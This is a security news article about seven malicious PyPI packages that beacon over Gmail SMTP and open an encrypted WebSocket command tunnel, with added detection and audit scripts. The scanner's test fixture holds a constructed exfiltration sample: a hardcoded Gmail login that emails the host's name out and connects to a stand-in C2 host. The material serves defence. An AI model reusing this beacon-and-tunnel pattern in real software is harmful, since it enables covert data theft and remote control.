Malicious PyPI Packages Exploit Gmail and WebSockets to Hijack Systems

Seven malicious PyPI packages exploited Gmail and WebSockets for remote command execution and data theft, with some packages downloaded over 18,000 times.

    Seven malicious packages were identified on PyPI that used Gmail’s SMTP servers and WebSockets for data exfiltration and remote command execution.

    Discovery and Removal of Malicious Packages

    The threat research team at Socket discovered these packages and reported their findings to PyPI, leading to their removal. Some of these packages had been available for over four years, with one package downloaded more than 18,000 times.

    List of Malicious Packages

    Here are the malicious packages identified by Socket:

    • Coffin-Codes-Pro (9,000 downloads)
    • Coffin-Codes-NET2 (6,200 downloads)
    • Coffin-Codes-NET (6,100 downloads)
    • Coffin-Codes-2022 (18,100 downloads)
    • Coffin2022 (6,500 downloads)
    • Coffin-Grave (6,500 downloads)
    • cfc-bsb (2,900 downloads)

    These packages impersonated the legitimate Coffin package, which integrates Jinja2 templates into Django projects.

    Malicious Functionality and Operations

    Socket’s investigation revealed that these packages provided covert remote access and data exfiltration, with Gmail serving as the signaling channel. On execution, the code logged into Gmail’s SMTP server (smtp.gmail.com) with hardcoded credentials and emailed reconnaissance data about the compromised host to an attacker-controlled inbox, announcing that a new victim was online.

    Techniques for Evasion

    Because Gmail is a trusted service, firewalls and endpoint detection and response (EDR) products are unlikely to flag outbound SMTP traffic to it. Once the email signal was sent, the malware connected to a remote server over a WebSocket secured with TLS (wss://), establishing a persistent, encrypted, bidirectional tunnel through which the attacker could issue commands. Defenders cannot rely on the destination here; the useful signal is the source, such as a Python interpreter on a build host authenticating to smtp.gmail.com with credentials that never appear in the project’s configuration.
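    The two traits described above, an SMTP login to smtp.gmail.com with string-literal credentials and a hardcoded wss:// endpoint, can be found statically before a package is ever imported. The following scanner is an added example, not Socket’s tooling or code from the packages themselves; the indicator set and the two sample modules (one constructed to mimic the described behaviour, one a benign mailer that reads its credentials from the environment) are assumptions made for illustration.

```python
import ast
import textwrap

# Indicators drawn from the behaviour described in the report. The set is an
# illustrative assumption, not Socket's detection rules.
MAIL_HOSTS = {"smtp.gmail.com"}
MAIL_CLASSES = {"SMTP", "SMTP_SSL"}


def _str(node):
    """Return the value of a string-literal AST node, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None


def _call_name(func):
    """'smtplib.SMTP_SSL' -> 'SMTP_SSL', 'srv.login' -> 'login', else None."""
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return None


def scan_source(source):
    """Return a sorted list of indicator tags found in one Python module's source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        # A literal wss:// URL is the encrypted WebSocket tunnel endpoint.
        text = _str(node)
        if text is not None and text.startswith("wss://"):
            findings.add("wss_endpoint")
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node.func)
        # smtplib.SMTP("smtp.gmail.com", ...) or SMTP_SSL(...) with a literal host.
        if name in MAIL_CLASSES and node.args and _str(node.args[0]) in MAIL_HOSTS:
            findings.add("gmail_smtp")
        # .login("user", "pass") where both credentials are string literals.
        if name == "login" and len(node.args) >= 2 and all(
            _str(arg) is not None for arg in node.args[:2]
        ):
            findings.add("hardcoded_credentials")
    return sorted(findings)


def verdict(source):
    """Flag a module only when the Gmail beacon and hardcoded credentials co-occur."""
    tags = set(scan_source(source))
    return "suspicious" if {"gmail_smtp", "hardcoded_credentials"} <= tags else "clean"


# Constructed sample mimicking the described beacon-then-tunnel behaviour
# (placeholder addresses and host; not the real package code).
MALICIOUS = textwrap.dedent('''
    import smtplib, socket, ssl, websocket
    srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    srv.login("attacker-inbox@gmail.com", "app-password-here")
    srv.sendmail("attacker-inbox@gmail.com", "attacker-inbox@gmail.com", socket.gethostname())
    ws = websocket.create_connection("wss://c2.example/tunnel", sslopt={"cert_reqs": ssl.CERT_NONE})
''')

# Constructed benign mailer: same host, but credentials come from the environment,
# so the hardcoded-credential indicator must not fire.
BENIGN = textwrap.dedent('''
    import os, smtplib
    srv = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    srv.login(os.environ["MAIL_USER"], os.environ["MAIL_PASS"])
''')
```

    Run `scan_source` over every `.py` file in a freshly downloaded sdist or wheel before installing it; requiring both indicators together keeps legitimate Gmail-based notifiers from tripping the check on their own.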

    Capabilities of the Malware

    Using a ‘Client’ class, the malware could:

    • Tunnel the attacker’s traffic through the compromised host into its local network
    • Access internal admin panels and APIs
    • Transfer files
    • Exfiltrate emails
    • Execute shell commands
    • Harvest credentials
    • Move laterally within networks

    Indicators of Cryptocurrency Theft

    Socket highlighted strong indicators that these packages aimed to steal cryptocurrency, as seen in the email addresses used, such as blockchain.bitcoins2020@gmail.com. This method resembles past tactics used to steal Solana private keys.

    If you have installed any of these packages, remove them immediately and rotate every key and credential that was reachable from the affected system, including cryptocurrency wallet keys, since an operator with shell access could have harvested anything stored there.
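    A quick `pip list | grep -i coffin` misses installs recorded under a normalized name (for example `coffin_codes_pro`). The check below is an added example, not part of the report: it compares installed distribution metadata against the package names listed above using PEP 503 name normalization and prints the matching uninstall command. The `fake_site_packages` fixture and `demo` function are assumptions that build a throwaway site-packages directory so the check can be exercised offline.

```python
import re
import tempfile
from importlib import metadata
from pathlib import Path

# Package names as listed in Socket's report.
MALICIOUS_PACKAGES = [
    "Coffin-Codes-Pro", "Coffin-Codes-NET2", "Coffin-Codes-NET",
    "Coffin-Codes-2022", "Coffin2022", "Coffin-Grave", "cfc-bsb",
]


def normalize(name):
    """PEP 503 normalization: case-insensitive, runs of '-', '_' and '.' become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


BAD = {normalize(n) for n in MALICIOUS_PACKAGES}


def find_installed(search_path=None):
    """Return sorted (name, version) pairs of malicious distributions.

    search_path defaults to sys.path, i.e. the running interpreter's environment;
    pass an explicit list of directories to audit another virtualenv's site-packages.
    """
    kwargs = {"path": list(search_path)} if search_path is not None else {}
    hits = []
    for dist in metadata.distributions(**kwargs):
        name = dist.metadata["Name"]
        if name and normalize(name) in BAD:
            hits.append((name, dist.version))
    return sorted(hits)


def uninstall_command(hits):
    """Build the pip command that removes every hit, or '' when there is nothing to do."""
    if not hits:
        return ""
    return "pip uninstall -y " + " ".join(name for name, _ in hits)


def fake_site_packages(root, name, version):
    """Constructed fixture (assumption): write a minimal .dist-info so the check runs offline."""
    info = Path(root) / f"{name.replace('-', '_')}-{version}.dist-info"
    info.mkdir(parents=True, exist_ok=True)
    (info / "METADATA").write_text(
        f"Metadata-Version: 2.1\nName: {name}\nVersion: {version}\n"
    )
    return info


def demo():
    """Audit a constructed directory holding one malicious and one benign package."""
    with tempfile.TemporaryDirectory() as root:
        fake_site_packages(root, "Coffin-Codes-Pro", "1.0")
        fake_site_packages(root, "requests", "2.31.0")
        return find_installed([root])


if __name__ == "__main__":
    hits = find_installed()  # audit the current interpreter
    print(hits or "no listed packages installed")
    if hits:
        print(uninstall_command(hits))
```

    Uninstalling is only the first step: the WebSocket tunnel gave the operator interactive access, so treat any host that ran one of these packages as compromised and rotate its secrets regardless of what the audit finds.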

    Related Findings in NPM

    A related report by Sonatype researcher Ax Sharma detailed a crypto-stealing package named crypto-encrypt-ts, found on npm. This package masqueraded as a TypeScript version of the now-unmaintained CryptoJS library while exfiltrating cryptocurrency wallet secrets to a threat actor-controlled endpoint.

    The malicious package, which persists on infected systems through cron jobs, targets wallets with balances exceeding 1,000 units, attempting to steal their private keys. It was downloaded nearly 2,000 times before being reported and removed.
